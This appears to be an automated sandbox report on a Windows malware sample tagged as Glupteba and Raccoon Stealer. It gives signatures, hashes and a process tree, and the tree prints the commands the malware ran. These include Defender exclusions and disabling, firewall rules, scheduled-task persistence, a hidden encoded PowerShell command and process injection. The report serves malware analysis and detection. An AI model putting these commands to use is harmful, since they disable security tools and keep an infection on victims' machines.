Resubmissions

10-12-2023 03:30

231210-d2s39adde2 10

10-12-2023 01:32

231210-bx3e1sbcfq 10

10-12-2023 01:04

231210-be3casbbcn 10

Analysis

  • max time kernel
    150s
  • max time network
    148s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231201-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231201-enlocale:en-usos:windows10-2004-x64system
  • submitted
    10-12-2023 03:30

General

  • Target

    file.exe

  • Size

    1.1MB

  • MD5

    f0b0a5f64dcfc3cbc85b115928903074

  • SHA1

    d77ad5345ea489673f4e00e892caa81f92aec7c1

  • SHA256

    0acc5eca8860dc87070e066f3258296228439b35bdb9fbc02185fc861a97475f

  • SHA512

    cbee9df095fd51e7b9a8c6ed69bff51b78c34ae6d87c85cd45bb8daa5378689914f29d73ecec0bdc0546167e2acc2e93eb630884a19397c655128b0e65fdccb9

  • SSDEEP

    24576:/JuwYk1FDiCaItlrzZNkSqVLHX4gG6WCepxaKpo:/AzqraItV3CD4gG6Xe1po

Malware Config

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba payload 10 IoCs
  • Raccoon

    Raccoon is an infostealer written in C++ and first seen in 2019.

  • Raccoon Stealer V2 payload 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • UAC bypass 3 TTPs 1 IoCs
  • Windows security bypass 2 TTPs 2 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Modifies Windows Firewall 1 TTPs 1 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 5 IoCs
  • Executes dropped EXE 22 IoCs
  • Loads dropped DLL 10 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • UPX packed file 20 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Windows security modification 2 TTPs 3 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Drops Chrome extension 2 IoCs
  • Drops desktop.ini file(s) 1 IoCs
  • Enumerates connected drives 3 TTPs 4 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Manipulates WinMonFS driver. 1 IoCs

    Roottkits write to WinMonFS to hide directories/files from being detected.

  • Drops file in System32 directory 35 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs

    Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

  • Drops file in Program Files directory 14 IoCs
  • Drops file in Windows directory 8 IoCs
  • Launches sc.exe 1 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 13 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies system certificate store 2 TTPs 5 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 20 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 1 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3388
      • C:\Users\Admin\AppData\Local\Temp\file.exe
        "C:\Users\Admin\AppData\Local\Temp\file.exe"
        2⤵
        • UAC bypass
        • Windows security bypass
        • Checks computer location settings
        • Windows security modification
        • Checks whether UAC is enabled
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        • System policy modification
        PID:4636
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
          3⤵
          • Drops startup file
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2404
          • C:\Users\Admin\Pictures\88CcuZyXWHoBIH2oEyiXfV8a.exe
            "C:\Users\Admin\Pictures\88CcuZyXWHoBIH2oEyiXfV8a.exe"
            4⤵
              PID:1996
              • C:\Windows\SysWOW64\cmd.exe
                cmd /k cmd < Shorts & exit
                5⤵
                  PID:2968
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd
                    6⤵
                      PID:860
                      • C:\Windows\SysWOW64\findstr.exe
                        findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
                        7⤵
                          PID:1360
                        • C:\Windows\SysWOW64\tasklist.exe
                          tasklist
                          7⤵
                          • Enumerates processes with tasklist
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1392
                        • C:\Windows\SysWOW64\findstr.exe
                          findstr /I "wrsa.exe"
                          7⤵
                            PID:4068
                          • C:\Windows\SysWOW64\tasklist.exe
                            tasklist
                            7⤵
                            • Enumerates processes with tasklist
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4528
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c mkdir 922
                            7⤵
                              PID:3044
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd /c copy /b Eat + Shirts + Greece + Encounter + Creates 922\Gilbert.pif
                              7⤵
                                PID:3596
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd /c copy /b Social + Scored 922\m
                                7⤵
                                  PID:2820
                                • C:\Windows\SysWOW64\PING.EXE
                                  ping -n 5 localhost
                                  7⤵
                                  • Runs ping.exe
                                  PID:3800
                                • C:\Users\Admin\AppData\Local\Temp\29844\922\Gilbert.pif
                                  922\Gilbert.pif 922\m
                                  7⤵
                                  • Executes dropped EXE
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of FindShellTrayWindow
                                  • Suspicious use of SendNotifyMessage
                                  PID:712
                          • C:\Users\Admin\Pictures\yNhtWoke53ho5qpZOVrBGj3e.exe
                            "C:\Users\Admin\Pictures\yNhtWoke53ho5qpZOVrBGj3e.exe"
                            4⤵
                            • Executes dropped EXE
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of WriteProcessMemory
                            PID:2868
                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              powershell -nologo -noprofile
                              5⤵
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2572
                            • C:\Users\Admin\Pictures\yNhtWoke53ho5qpZOVrBGj3e.exe
                              "C:\Users\Admin\Pictures\yNhtWoke53ho5qpZOVrBGj3e.exe"
                              5⤵
                              • Executes dropped EXE
                              • Adds Run key to start application
                              • Checks for VirtualBox DLLs, possible anti-VM trick
                              • Drops file in Windows directory
                              • Modifies data under HKEY_USERS
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of WriteProcessMemory
                              PID:3496
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                powershell -nologo -noprofile
                                6⤵
                                • Drops file in System32 directory
                                • Modifies data under HKEY_USERS
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4072
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
                                6⤵
                                  PID:2432
                                  • C:\Windows\system32\netsh.exe
                                    netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                                    7⤵
                                    • Modifies Windows Firewall
                                    PID:3096
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  powershell -nologo -noprofile
                                  6⤵
                                    PID:1624
                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    powershell -nologo -noprofile
                                    6⤵
                                    • Drops file in System32 directory
                                    • Modifies data under HKEY_USERS
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:872
                                  • C:\Windows\rss\csrss.exe
                                    C:\Windows\rss\csrss.exe
                                    6⤵
                                    • Executes dropped EXE
                                    • Adds Run key to start application
                                    • Manipulates WinMonFS driver.
                                    • Drops file in Windows directory
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:1868
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      powershell -nologo -noprofile
                                      7⤵
                                      • Drops file in System32 directory
                                      • Modifies data under HKEY_USERS
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:3800
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      powershell -nologo -noprofile
                                      7⤵
                                        PID:5104
                                      • C:\Windows\SYSTEM32\schtasks.exe
                                        schtasks /delete /tn ScheduledUpdate /f
                                        7⤵
                                          PID:3592
                                        • C:\Windows\SYSTEM32\schtasks.exe
                                          schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                                          7⤵
                                          • Creates scheduled task(s)
                                          PID:3796
                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          powershell -nologo -noprofile
                                          7⤵
                                          • Drops file in System32 directory
                                          • Modifies data under HKEY_USERS
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:1784
                                        • C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
                                          C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
                                          7⤵
                                          • Executes dropped EXE
                                          • Drops file in System32 directory
                                          • Modifies data under HKEY_USERS
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:1624
                                        • C:\Windows\SYSTEM32\schtasks.exe
                                          schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                                          7⤵
                                          • Creates scheduled task(s)
                                          PID:2960
                                        • C:\Windows\windefender.exe
                                          "C:\Windows\windefender.exe"
                                          7⤵
                                          • Executes dropped EXE
                                          PID:3492
                                          • C:\Windows\SysWOW64\cmd.exe
                                            cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                                            8⤵
                                              PID:4612
                                    • C:\Users\Admin\Pictures\EUA8FUrCrHj7WGR8Q6fH3SlR.exe
                                      "C:\Users\Admin\Pictures\EUA8FUrCrHj7WGR8Q6fH3SlR.exe" --silent --allusers=0
                                      4⤵
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      • Enumerates connected drives
                                      • Modifies system certificate store
                                      • Suspicious use of WriteProcessMemory
                                      PID:3048
                                      • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\EUA8FUrCrHj7WGR8Q6fH3SlR.exe
                                        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\EUA8FUrCrHj7WGR8Q6fH3SlR.exe" --version
                                        5⤵
                                          PID:4684
                                        • C:\Users\Admin\Pictures\EUA8FUrCrHj7WGR8Q6fH3SlR.exe
                                          "C:\Users\Admin\Pictures\EUA8FUrCrHj7WGR8Q6fH3SlR.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=3048 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20231210033052" --session-guid=7e515bb7-ea72-4b8b-b10b-2bd431631864 --server-tracking-blob=YTgzMjU3MGEyY2QzZTQ3NGUxOGQyMzE2YWJlOTdmY2YyYTI0OTQ0YzkyNWQ3ZThkMjAyYWE0ZDFlMTE0NDEyMTp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2NyIsInN5c3RlbSI6eyJwbGF0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjEwIiwicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTcwMjE3OTA1MC44MTcyIiwidXRtIjp7ImNhbXBhaWduIjoiNzY3IiwibWVkaXVtIjoiYXBiIiwic291cmNlIjoibWt0In0sInV1aWQiOiJjNzE1N2M5OS1lNWU4LTRmOTYtODkxNC1jYzYwN2UyMWE2ZTkifQ== --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=7005000000000000
                                          5⤵
                                          • Executes dropped EXE
                                          • Loads dropped DLL
                                          • Enumerates connected drives
                                          • Suspicious use of WriteProcessMemory
                                          PID:1888
                                        • C:\Users\Admin\Pictures\EUA8FUrCrHj7WGR8Q6fH3SlR.exe
                                          C:\Users\Admin\Pictures\EUA8FUrCrHj7WGR8Q6fH3SlR.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=105.0.4970.34 --initial-client-data=0x2e8,0x2ec,0x2f0,0x2c8,0x2f4,0x6ea574f0,0x6ea57500,0x6ea5750c
                                          5⤵
                                          • Executes dropped EXE
                                          • Loads dropped DLL
                                          PID:1844
                                        • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202312100330521\assistant\Assistant_103.0.4928.25_Setup.exe_sfx.exe
                                          "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202312100330521\assistant\Assistant_103.0.4928.25_Setup.exe_sfx.exe"
                                          5⤵
                                          • Executes dropped EXE
                                          PID:4008
                                        • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202312100330521\assistant\assistant_installer.exe
                                          "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202312100330521\assistant\assistant_installer.exe" --version
                                          5⤵
                                          • Executes dropped EXE
                                          • Loads dropped DLL
                                          PID:4872
                                      • C:\Users\Admin\Pictures\wfwTB8IAgrfqDrHH46ZQWYPn.exe
                                        "C:\Users\Admin\Pictures\wfwTB8IAgrfqDrHH46ZQWYPn.exe"
                                        4⤵
                                        • Executes dropped EXE
                                        • Suspicious use of WriteProcessMemory
                                        PID:4444
                                        • C:\Users\Admin\AppData\Local\Temp\7zS69F5.tmp\Install.exe
                                          .\Install.exe
                                          5⤵
                                          • Executes dropped EXE
                                          • Suspicious use of WriteProcessMemory
                                          PID:2136
                                          • C:\Users\Admin\AppData\Local\Temp\7zS6CE3.tmp\Install.exe
                                            .\Install.exe /lDHdiduJxZ "385118" /S
                                            6⤵
                                            • Checks BIOS information in registry
                                            • Checks computer location settings
                                            • Executes dropped EXE
                                            • Drops file in System32 directory
                                            • Enumerates system info in registry
                                            • Suspicious use of WriteProcessMemory
                                            PID:2008
                                            • C:\Windows\SysWOW64\forfiles.exe
                                              "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
                                              7⤵
                                              • Suspicious use of WriteProcessMemory
                                              PID:4324
                                              • C:\Windows\SysWOW64\cmd.exe
                                                /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                                                8⤵
                                                • Suspicious use of WriteProcessMemory
                                                PID:4108
                                            • C:\Windows\SysWOW64\forfiles.exe
                                              "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
                                              7⤵
                                              • Suspicious use of WriteProcessMemory
                                              PID:4964
                                              • C:\Windows\SysWOW64\cmd.exe
                                                /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
                                                8⤵
                                                  PID:1872
                                                  • \??\c:\windows\SysWOW64\reg.exe
                                                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                                                    9⤵
                                                      PID:1020
                                                • C:\Windows\SysWOW64\schtasks.exe
                                                  schtasks /CREATE /TN "gdJPuYBiL" /SC once /ST 02:07:57 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                  7⤵
                                                  • Creates scheduled task(s)
                                                  PID:4644
                                                • C:\Windows\SysWOW64\schtasks.exe
                                                  schtasks /run /I /tn "gdJPuYBiL"
                                                  7⤵
                                                    PID:540
                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                    schtasks /CREATE /TN "bEyYKbsuUozdEyKwWq" /SC once /ST 03:32:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\ZhTQaFaBDmtyfHbtF\rWZwyvlULFiFahc\WUeXAIq.exe\" vP /iDsite_idPAc 385118 /S" /V1 /F
                                                    7⤵
                                                    • Drops file in Windows directory
                                                    • Creates scheduled task(s)
                                                    PID:2660
                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                    schtasks /DELETE /F /TN "gdJPuYBiL"
                                                    7⤵
                                                      PID:5008
                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\file.exe" -Force
                                              3⤵
                                              • Suspicious behavior: EnumeratesProcesses
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:4040
                                          • C:\Users\Admin\AppData\Local\Temp\29844\922\Gilbert.pif
                                            C:\Users\Admin\AppData\Local\Temp\29844\922\Gilbert.pif
                                            2⤵
                                              PID:2144
                                          • C:\Users\Admin\Pictures\EUA8FUrCrHj7WGR8Q6fH3SlR.exe
                                            C:\Users\Admin\Pictures\EUA8FUrCrHj7WGR8Q6fH3SlR.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=105.0.4970.34 --initial-client-data=0x2f4,0x2f8,0x2fc,0x2c4,0x300,0x6db174f0,0x6db17500,0x6db1750c
                                            1⤵
                                            • Executes dropped EXE
                                            • Loads dropped DLL
                                            PID:428
                                          • \??\c:\windows\SysWOW64\reg.exe
                                            REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
                                            1⤵
                                              PID:3224
                                            • \??\c:\windows\SysWOW64\reg.exe
                                              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                                              1⤵
                                                PID:3624
                                              • \??\c:\windows\SysWOW64\reg.exe
                                                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                                                1⤵
                                                  PID:2128
                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                  1⤵
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:2068
                                                  • C:\Windows\system32\gpupdate.exe
                                                    "C:\Windows\system32\gpupdate.exe" /force
                                                    2⤵
                                                      PID:2996
                                                  • C:\Windows\system32\svchost.exe
                                                    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                    1⤵
                                                      PID:1152
                                                    • C:\Windows\system32\svchost.exe
                                                      C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                                      1⤵
                                                        PID:4484
                                                      • C:\Windows\system32\gpscript.exe
                                                        gpscript.exe /RefreshSystemParam
                                                        1⤵
                                                          PID:3616
                                                        • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202312100330521\assistant\assistant_installer.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202312100330521\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=103.0.4928.25 --initial-client-data=0x270,0x274,0x278,0x24c,0x27c,0x2a1588,0x2a1598,0x2a15a4
                                                          1⤵
                                                          • Executes dropped EXE
                                                          • Loads dropped DLL
                                                          PID:916
                                                        • C:\Windows\System32\sihclient.exe
                                                          C:\Windows\System32\sihclient.exe /cv RbisCHiUPUmrsjkxxixRzA.0.2
                                                          1⤵
                                                          • Drops file in System32 directory
                                                          • Modifies data under HKEY_USERS
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:5104
                                                        • C:\Windows\windefender.exe
                                                          C:\Windows\windefender.exe
                                                          1⤵
                                                          • Executes dropped EXE
                                                          • Modifies data under HKEY_USERS
                                                          PID:3984
                                                        • C:\Windows\SysWOW64\sc.exe
                                                          sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                                                          1⤵
                                                          • Launches sc.exe
                                                          PID:1120
                                                        • C:\Users\Admin\AppData\Local\Temp\ZhTQaFaBDmtyfHbtF\rWZwyvlULFiFahc\WUeXAIq.exe
                                                          C:\Users\Admin\AppData\Local\Temp\ZhTQaFaBDmtyfHbtF\rWZwyvlULFiFahc\WUeXAIq.exe vP /iDsite_idPAc 385118 /S
                                                          1⤵
                                                          • Executes dropped EXE
                                                          • Drops file in System32 directory
                                                          PID:1632
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows 